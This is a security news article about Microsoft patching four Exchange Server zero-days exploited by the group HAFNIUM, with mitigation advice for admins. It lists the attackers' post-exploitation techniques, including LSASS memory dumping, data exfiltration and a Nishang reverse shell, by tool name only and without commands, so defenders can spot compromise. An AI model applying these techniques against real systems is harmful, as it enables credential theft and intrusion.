Microsoft Pushes Urgent Updates for Exchange Server After the Discovery of Multiple 0-Days

  • Microsoft has fixed several 0-day flaws that Chinese hackers were exploiting.
  • The vulnerabilities were chained together to achieve a high-level compromise, data access, and exfiltration.
  • The actors went on undeterred for at least two months already, so updating now is exigent.

Microsoft has confirmed the existence of multiple 0-day exploits on the Exchange Server that are being actively used by an actor called “HAFNIUM.” This is a group of hackers that primarily targets US-based entities and is believed to be supported by the Chinese group supported by the state.

While the attacks appear to be limited according to Microsoft, they were very damaging, as the hackers may have accessed email accounts through compromised Exchange servers, could have installed malware, and may have planted web shell backdoors to help them move around.

The IDs of the newly discovered 0-days are CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065, all of which were addressed in the latest update. The affected MS Exchange Server versions include 2013, 2016, and also 2019. The actors have chained these flaws to carry out a powerful attack, which is indicative of their sophistication. Microsoft has also discovered and fixed CVE-2021-26412, CVE-2021-26854, and CVE-2021-27078, but these three aren’t related to the HAFNIUM attacks.

If you’re unable to apply the fixing patch right now, you may apply the mitigation of setting up a VPN to separate the Exchange server from external access. Note that this will only stop the first step of the attack, which is to establish an untrusted connection to Exchange server port 443. Still, it may be enough to cause a disruption. If the attacker has already compromised your server, though, this mitigation won’t make any difference whatsoever.

As Microsoft details, HAFNIUM performed the following post-exploitation activity:

  • Used Procdump to dump the LSASS process memory
  • Used 7-Zip to compress and exfiltrate stolen data
  • Added and used Exchange PowerShell snap-ins to export mailbox data
  • Used the Nishang Invoke-PowerShellTcpOneLine reverse shell
  • Downloaded PowerCat straight from GitHub and used it to open a remote server connection

Thus, if you are an Exchange server admin, consider the above signs of trouble and actively scan your log files to detect any indicators of compromise. If you see any ZIPs, RARs, or 7z files on C:\ProgramData\, consider your data exfiltrated. According to Microsoft, the actors like to download the Exchange offline address book, so they grab organization and user information too.

If you find that you’re already under attack by HAFNIUM, check out this piece to figure out how to develop effective defending mechanisms. The most urgent action to take right now, though, is to update all externally facing Exchange Servers.

Finally, according to a blog post by Volexity researchers, who were the ones to discover these attacks and report them to Microsoft, the first signs of active exploitation of the aforementioned flaws appeared as far back as January 6, 2021.

REVIEW OVERVIEW

Latest

Indian Banks and Finance Companies Targeted by Multi-Staged JSOutProx RAT Malware

Indian banks and financial institutions are being targeted by a multi-tier JSOutProx RAT that acts in two stages.The malware uses spear-phishing emails...

Mega Deletes 144,000+ User Accounts for Repeated Copyright Infringement

Mega has changed its policies and terminated over 144,000 accounts for repeated copyright infringement violations.The company says flagged data is taken down...

YouTube Creators Targeted With Phishing Scams Based on Cookie Theft Malware

Google discoverd a new Cookie Theft-based phishing scam that targeted channels belonging to YouTube creators.Actors were sending phishing emails and hijacking channels...
For a better user experience we recommend using a more modern browser. We support the latest version of the following browsers: For a better user experience we recommend using the latest version of the following browsers: Chrome, Edge, Firefox, Safari